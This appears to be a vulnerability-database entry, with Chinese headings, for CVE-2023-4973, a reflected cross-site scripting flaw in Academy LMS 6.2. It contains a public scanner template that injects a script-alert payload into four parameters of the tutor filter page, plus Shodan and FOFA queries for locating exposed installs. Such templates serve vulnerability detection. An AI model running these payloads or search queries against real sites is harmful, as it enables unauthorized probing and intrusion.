CVE-2023-4973: Academy LMS 6.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Academy LMS | POC: 已公开

漏洞描述

A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.

PoC代码[已公开]

id: CVE-2023-4973

info:
  name: Academy LMS 6.2 - Cross-Site Scripting
  author: ritikchaddha,princechaddha
  severity: medium
  description: |
    A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.
  reference:
    - https://packetstormsecurity.com/files/174680/Academy-LMS-6.2-Cross-Site-Scripting.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4973
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4973
    cwe-id: CWE-79
    epss-score: 0.03546
    epss-percentile: 0.87286
    cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: creativeitem
    product: academy_lms
    shodan-query:
      - html:"Academy LMS"
      - http.html:"academy lms"
    fofa-query:
      - body="Academy LMS"
      - body="academy lms"
  tags: packetstorm,cve2023,cve,academylms,xss,creativeitem,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_tution_class_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_duration%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "List of tuitions")'
        condition: and
# digest: 4a0a00473045022100be64accc54eda60e5675d0e3ba8d7bb3db8f7489507a53d76f47ac507b052e3302201d84aa57b2fd1007acac80ea4ae3b70e1de872152a1e7bd7a05f1b306d913d29:922c64590222798bb761d5b6d8e72950

相关漏洞推荐